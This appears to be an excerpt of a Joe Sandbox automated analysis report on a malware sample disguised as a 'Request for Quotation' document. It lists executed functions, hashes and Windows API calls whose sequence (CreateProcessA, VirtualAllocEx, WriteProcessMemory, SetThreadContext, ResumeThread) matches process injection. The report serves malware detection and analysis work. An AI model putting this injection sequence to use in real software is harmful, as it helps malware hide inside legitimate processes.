Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680e8e197c9bf02f4aa750719e58fca0698d9e9c58115384a043e89fced3cae5
Instruction ID: 41488ca4cd720f25f4bc7eaff9e31a4a418c4aac3dd64dd4841f8f7c1a2af21d
Opcode Fuzzy Hash: 680e8e197c9bf02f4aa750719e58fca0698d9e9c58115384a043e89fced3cae5
Instruction Fuzzy Hash: F5E1EC70B013048FDB65EB75C850BAEBBF6AF89300F15446DE94AEB291CB34E981CB55

Function 06C5B736 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3df81faaa1cfb6f2123996c161158b494ec8f0936030598e646df728be62f4
Instruction ID: 6da812a35797c0d28c22ba280be70436e1a8e8be46db10c390f45a8e37a117cc
Opcode Fuzzy Hash: dd3df81faaa1cfb6f2123996c161158b494ec8f0936030598e646df728be62f4
Instruction Fuzzy Hash: F3A00240CAF454C8A2C05D120C252F8D9BC060F451F8330004C1E332164450C8C0109D

Function 00EFCFA0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00EFD01E
GetCurrentThread.KERNEL32 ref: 00EFD05B
GetCurrentProcess.KERNEL32 ref: 00EFD098
GetCurrentThreadId.KERNEL32 ref: 00EFD0F1

Memory Dump Source

Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 58994dbf798b62220bb59b6d2d6f7b5e8ab00bfb032c47122e527f9e609c13a0
Instruction ID: bf382e7f71c01ebb521dae01731548863dc657c5851e0b537eecee0c2a909712
Opcode Fuzzy Hash: 58994dbf798b62220bb59b6d2d6f7b5e8ab00bfb032c47122e527f9e609c13a0
Instruction Fuzzy Hash: CA5167B0904309CFDB14CFA9D948BAEBBF2FF88314F248459E519B7250DB746944CB65

Function 06C57F64 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C581A6

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fabed10d909514cf5e8958c49115c5328b08b338d1fd35cfaafbf3922456a356
Instruction ID: e8a200f522002bd73a5a3eabd01bbd3d378c3c2f2e439ec5ca45fb8deb57b5d7
Opcode Fuzzy Hash: fabed10d909514cf5e8958c49115c5328b08b338d1fd35cfaafbf3922456a356
Instruction Fuzzy Hash: 82A18C71D01669CFDF64CFA8CC417AEBBB2BF48300F1581AAD808A7240DB759A85CF95

Function 06C57F70 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C581A6

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 22229a2cc9c58267da18da2254d773d255e978f1939b02263e7b7237528fc035
Instruction ID: 2d76e16178c5c6cdd66c83ec9b928c3de5eeb4cdded5c388f6e08e9172045fad
Opcode Fuzzy Hash: 22229a2cc9c58267da18da2254d773d255e978f1939b02263e7b7237528fc035
Instruction Fuzzy Hash: E1918C71D01669CFDF64CFA8CC417AEBBB2BF48310F1581AAD808A7240DB759A85CF95

Function 00EF44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00EF59A9

Memory Dump Source

Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 07dd165b0324a0b6bd49d994245c35c5d12a57ae5b8790c8fb123a9931afc1be
Instruction ID: 7982622fd7fca509b1b2ab4f3b7067940b98fb9b44bd522abcb275173378128b
Opcode Fuzzy Hash: 07dd165b0324a0b6bd49d994245c35c5d12a57ae5b8790c8fb123a9931afc1be
Instruction Fuzzy Hash: D341E2B1C0071DCADB24CFA9C884B9EBBB5BF89304F20816AD508BB251DB756945CF90

Function 00EF58EC Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00EF59A9

Memory Dump Source

Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6f126329ec2d538629c4a89454fecb59b407f2c087c69e591e18fc393105aa35
Instruction ID: 1586962d0687eaa662d83826f31b7b01b73251e750c29ce3b3d1e276524b766e
Opcode Fuzzy Hash: 6f126329ec2d538629c4a89454fecb59b407f2c087c69e591e18fc393105aa35
Instruction Fuzzy Hash: 134100B1C0071DCADB25CFA9C884B9DBBB6BF89304F20816AD518BB251DB756946CF90

Function 06C57CE0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C57D78

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 77558a86bc8553ae68517e5b277e7eedefc4400062b24c19c9b1d2921d53c75c
Instruction ID: 3bd76875f3f3efc1174375bd0fe17242f5ed2187677326d8a7df7202e1c44a5d
Opcode Fuzzy Hash: 77558a86bc8553ae68517e5b277e7eedefc4400062b24c19c9b1d2921d53c75c
Instruction Fuzzy Hash: 232137B59002499FDB10CFA9C881BEEBBF5FF48320F10842AE919A7250D7789941DBA4

Function 06C57CE8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C57D78

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 609f1e62ac0323a3ed38b4e5458fd9041e97c6f9bbddea95ec1ac01c8b76c29c
Instruction ID: e33bfefef89e40a1aabc24aa7bbab3c582e85f01b4d71bdbca55efc7caf5a7be
Opcode Fuzzy Hash: 609f1e62ac0323a3ed38b4e5458fd9041e97c6f9bbddea95ec1ac01c8b76c29c
Instruction Fuzzy Hash: 54212AB1900349DFCB10CFA9C985BEEBBF5FF48310F10842AE919A7250D7789544DBA5

Function 06C57DD0 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C57E58

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fb8b823887c85b4ccd8ee9ecf0b481ce90821230f4adbc70affacc3239706910
Instruction ID: bf24082c745cb98c297d60af0b836ad6e850ac74bb732ce8876af83ee6613beb
Opcode Fuzzy Hash: fb8b823887c85b4ccd8ee9ecf0b481ce90821230f4adbc70affacc3239706910
Instruction Fuzzy Hash: 73214CB1D00349DFDB10CFA9C841ADEBBF5FF48320F108429E919A7240D7789940DBA1

Function 06C57B48 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C57BCE

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b0a89ad82eae3efaea3583bf74f9000787a86fa4fd725cf4bf0e5fe03d5a51d3
Instruction ID: 79d65014ab88a7bc239141bef6b63109fdf175daefbeea93fb0f32987655178d
Opcode Fuzzy Hash: b0a89ad82eae3efaea3583bf74f9000787a86fa4fd725cf4bf0e5fe03d5a51d3
Instruction Fuzzy Hash: 38212AB1D003098FDB10DFAAC985BEEBBF4AF48324F14842AD559A7240C7789585CBA5

Function 06C57DD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C57E58

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a148e122ae85f7fb5637b3070254bf7d77331bcb8951a5bf8fd107fc8c43b6c4
Instruction ID: 2444140c529542081c558dd32313c86588244adf7b56c1157914cbdd31506972
Opcode Fuzzy Hash: a148e122ae85f7fb5637b3070254bf7d77331bcb8951a5bf8fd107fc8c43b6c4
Instruction Fuzzy Hash: AC2128B1D00349DFCB10CFAAC881ADEBBF5FF48320F10842AE918A7250C7789940DBA5

Function 06C57B50 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C57BCE

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0fa8a3bb4cb16c14218c22e8015c72592a32270d9937064146424bfc61185be8
Instruction ID: 063179bcee59e19303695d299be53dde4c176207d09c4311e3f437008dc4e577
Opcode Fuzzy Hash: 0fa8a3bb4cb16c14218c22e8015c72592a32270d9937064146424bfc61185be8
Instruction Fuzzy Hash: 3D211AB1D003098FDB50DFAAC985BAEBBF4EF58324F14842AD919A7240C7789585CFA5

Function 00EFD5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EFD677

Memory Dump Source

Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 333cb3fff258639ccd6dbeeda22c62cc83541be312086fc4e822148f2865b7ea
Instruction ID: deb9fe1d3863202894a9ed76608c6a9566b5cfd77e3c54e1755bd54cb2ee8981
Opcode Fuzzy Hash: 333cb3fff258639ccd6dbeeda22c62cc83541be312086fc4e822148f2865b7ea
Instruction Fuzzy Hash: CA21C6B5900249DFDB10CF9AD984ADEBFF5EB48320F14841AE918A7350D378A954CF65

Function 06C57C20 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C57C96

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9f6f977db9d282c9f6f22565422693a3e7d3f845f76f0a83dfd94002a0801716
Instruction ID: e987ecfc435e6cc8358a4c9c8905151800b22ff5a05ef76ad90780f8cbc72584
Opcode Fuzzy Hash: 9f6f977db9d282c9f6f22565422693a3e7d3f845f76f0a83dfd94002a0801716
Instruction Fuzzy Hash: 3D1147B19002499FCB20DFAAC845ADEBFF5EF49320F248419E559A7250C775A580DFA1

Function 06C57C28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C57C96

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ef2d36dc78b5c3a2769ab44ccd0f0cce19c5f7ff693746d008def35d3782235e
Instruction ID: b7fd4d5ee2b8a1ce7dedbc6c632658fe576e0d0236cacdca619b3d5492886843
Opcode Fuzzy Hash: ef2d36dc78b5c3a2769ab44ccd0f0cce19c5f7ff693746d008def35d3782235e
Instruction Fuzzy Hash: 8C113AB1900249DFCB20DFAAC845ADEBFF5EF48320F148419E519A7250C775A540DFA1

Function 06C57A98 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C57B02

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 41af379d893512ae1d8363601f72c1c448d7e2f1ec073b799fea55c8a732e2f6
Instruction ID: 8c4bd2411677696f1cfce2c0761b4897b126ec4228394387f2fd85de424c83b2
Opcode Fuzzy Hash: 41af379d893512ae1d8363601f72c1c448d7e2f1ec073b799fea55c8a732e2f6
Instruction Fuzzy Hash: 041149B1D003498ADB20DFAAC845B9EFFF8AF88324F248419D459A7240CA796544CBA5

Function 06C57AA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C57B02

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: db63e76b6175fd695a15087f6ae6242d1c09d86e8e3eca678e5387663c2d75a8
Instruction ID: c541676a91eb34ae0cb77f77f3d47de8716bce16195ab0e4431864eeecb4010e
Opcode Fuzzy Hash: db63e76b6175fd695a15087f6ae6242d1c09d86e8e3eca678e5387663c2d75a8
Instruction Fuzzy Hash: 34113AB1D003498FDB20DFAAC845B9EFBF9EF88324F24841AD519A7240C7796544CBA5

Function 06C5C338 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C5C39D

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 750995ec1c79b7ca144b9cf8ace4f8e807433258f7117007366491f33c496fe8
Instruction ID: bd84105a8298e93fb43e84c71bcd2d15394986511f8ef9ec4959afe714ae8aec
Opcode Fuzzy Hash: 750995ec1c79b7ca144b9cf8ace4f8e807433258f7117007366491f33c496fe8
Instruction Fuzzy Hash: F01128B5800349DFDB60CF9AD845BDEBFF8EB48310F14841AD854A3240C3796584CFA1

Function 06C563E0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C5C39D

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1a2e32a845a851231607c48185d722260564a01f7c7e83a4258ae694b7ce3944
Instruction ID: 36d43084edc42df4bd06a326e8658a94e3d72d4c5368db5a0e5ad9fa880be6f4
Opcode Fuzzy Hash: 1a2e32a845a851231607c48185d722260564a01f7c7e83a4258ae694b7ce3944
Instruction Fuzzy Hash: 13110AB5800349DFDB50DF9AD945BDEBBF8EB48324F10845AD914A7240C379A944CFA5

Function 00EFAEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00EFAF5E

Memory Dump Source

Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 13f19d6d0d5667214fe2c258b81af69017aa39feae431365230dfc600467127b
Instruction ID: 77df5ae39f4aa0c6feec266564e0cb6b1efa420d6b426a2373856cd875132a7f
Opcode Fuzzy Hash: 13f19d6d0d5667214fe2c258b81af69017aa39feae431365230dfc600467127b
Instruction Fuzzy Hash: AC11D2B6D002498FCB20CF9AD444A9EFBF4EB88324F14856AD919BB610C379A545CFA1

Function 00B7D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109899984.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b7d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02780d06c8091b631de5b63b1fc77451c6d0206824314e0edb61f649a86511b6
Instruction ID: d6fb3a7174af1213c91e9f5c0f1e1628ae72a44782b047c27b43dda2511f0891
Opcode Fuzzy Hash: 02780d06c8091b631de5b63b1fc77451c6d0206824314e0edb61f649a86511b6
Instruction Fuzzy Hash: 282133B1504200DFCB05DF14C9C0B26BFB5FFA8368F24C5A9E9090B256C336D806DBA1

Function 00B8D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110966424.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd893af9aade855cd90a626d8a43e4b4700f96ceab3350eeb2e007b056c53192
Instruction ID: 2bbbfa85fc7c343dd171fdd5b639503c362f73c02f526dc663dba1c77f989dee
Opcode Fuzzy Hash: dd893af9aade855cd90a626d8a43e4b4700f96ceab3350eeb2e007b056c53192
Instruction Fuzzy Hash: 02213771504200DFCB14EF14D9D0B26BBA5FB84314F20C5AED80A4B2E6C336D807CB61

Function 00B8D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110966424.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ac9b5858a485dbe5cf10d2bbb3be7627fcbfa187ee1f08613b43a5f4796437
Instruction ID: fa251b3183cdc75429653bb32b7196bd61b31d570814a0b434ce6e47597edc4d
Opcode Fuzzy Hash: 97ac9b5858a485dbe5cf10d2bbb3be7627fcbfa187ee1f08613b43a5f4796437
Instruction Fuzzy Hash: 642107B1604204EFDB05EF14D5C0F26BBA5FB84314F24C9AEE9094B2E1C336D846CB61

Function 00B8D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110966424.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 949668576c96953404e91580b508b08b36f96658d500d1d58a2f82a565ee7763
Instruction ID: b7b0ec9d9728eeb25ccccc0b53d9c4c8e7175944118aaebd731cab93954c71d9
Opcode Fuzzy Hash: 949668576c96953404e91580b508b08b36f96658d500d1d58a2f82a565ee7763
Instruction Fuzzy Hash: 3021A4755093808FDB12DF24D590B15BFB1EB45314F28C5DBD8498B6A7C33AD80ACB62

Function 00B7D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109899984.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b7d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: d748f547cda720c48e2075e71914327cecb4f92cddcfbbeaf338d368d90610eb
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: E011D376504280CFCB16CF14D5C4B16BFB2FF94328F24C6AAD8494B656C33AD85ACBA1

Function 00B8D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110966424.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 829ae08282671ebd9686f066248d0838427e5b58e3641bf736b4c9561e86aa00
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 5C11DD75504280DFCB12DF14C5C0B15FBB2FB84314F24C6AED8494B6A6C33AD84ACB61

Function 00B7D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109899984.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b7d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ee0e08c794e9fdbfe5329d35f75e2c9a947f687c66bee43c27421bee8ed0e6
Instruction ID: f6a848327a25e122eaa08c9b82c38a7013fbacc57a6a9ca368f2e691799404aa
Opcode Fuzzy Hash: f4ee0e08c794e9fdbfe5329d35f75e2c9a947f687c66bee43c27421bee8ed0e6
Instruction Fuzzy Hash: 7C0126B10083009AE7288B29CCC0B26FFF8DF513A0F18C99AED1C4A282C7389C40C6B1

Function 00B7D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109899984.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b7d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7367db7140124574d00d67e93c18bc71655199854e0edaaadcd575571d5915f
Instruction ID: 26005a854e282d4e1765e2e1975f4ed16054a420ab2f5b111d2a62497fded109
Opcode Fuzzy Hash: c7367db7140124574d00d67e93c18bc71655199854e0edaaadcd575571d5915f
Instruction Fuzzy Hash: 82F0C2714043409EE7248A1ADCC4B62FFE8EF51764F18C55AED1C4A286C379AC44CAB0

Non-executed Functions

Function 06C56E40 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61dca00cbeace4a13019d384e290f88f5dacdc415f880c5ca67e3b129b8e6ab
Instruction ID: 1b109adbfd96b9c6c0515e1a780956c6468f539001f4421cf6c0e86162a1ebab
Opcode Fuzzy Hash: d61dca00cbeace4a13019d384e290f88f5dacdc415f880c5ca67e3b129b8e6ab
Instruction Fuzzy Hash: 5CE10B74E102198FCB54DFA9C9909AEFBF2FF89304F248169D814AB355D731A982CF60

Function 06C55798 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f0a97ebeba37e867c5dfdd542285d33ab7a45fd8e895d5565682b07919b5d9
Instruction ID: 56e53c25107edebb45ac46de5fe34076067d37cb2e5857800b40eabbfbb73619
Opcode Fuzzy Hash: 38f0a97ebeba37e867c5dfdd542285d33ab7a45fd8e895d5565682b07919b5d9
Instruction Fuzzy Hash: F2E11D74E102198FCB54DFA9C9809AEFBF2FF89304F648159D814AB355D731A982CFA0

Function 06C54F28 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02a013cd1bc0cab62844e8899648eeb107c0a4d03e854dd554c218dd0664256
Instruction ID: d4d3502fad2676d3101c3a79fd575e4551fad565791968929d4243debedcc378
Opcode Fuzzy Hash: c02a013cd1bc0cab62844e8899648eeb107c0a4d03e854dd554c218dd0664256
Instruction Fuzzy Hash: F5E11D74E102198FCB54DFA9C9849AEFBF2FF89304F648159D814AB355D731A982CFA0

Function 06C57278 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07adbae13f4614323db4852f4b527cc29f8ad8b77f5420f368ad238fdc700cfc
Instruction ID: ed35dabc121cf31100af3cdaaa2f3cd3b7da4029ce022088c3801765172b8272
Opcode Fuzzy Hash: 07adbae13f4614323db4852f4b527cc29f8ad8b77f5420f368ad238fdc700cfc
Instruction Fuzzy Hash: 15E11F74E102198FCB54DFA9C9849AEFBF2FF49304F248169D814AB355D731A982CF64

Function 06C55360 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

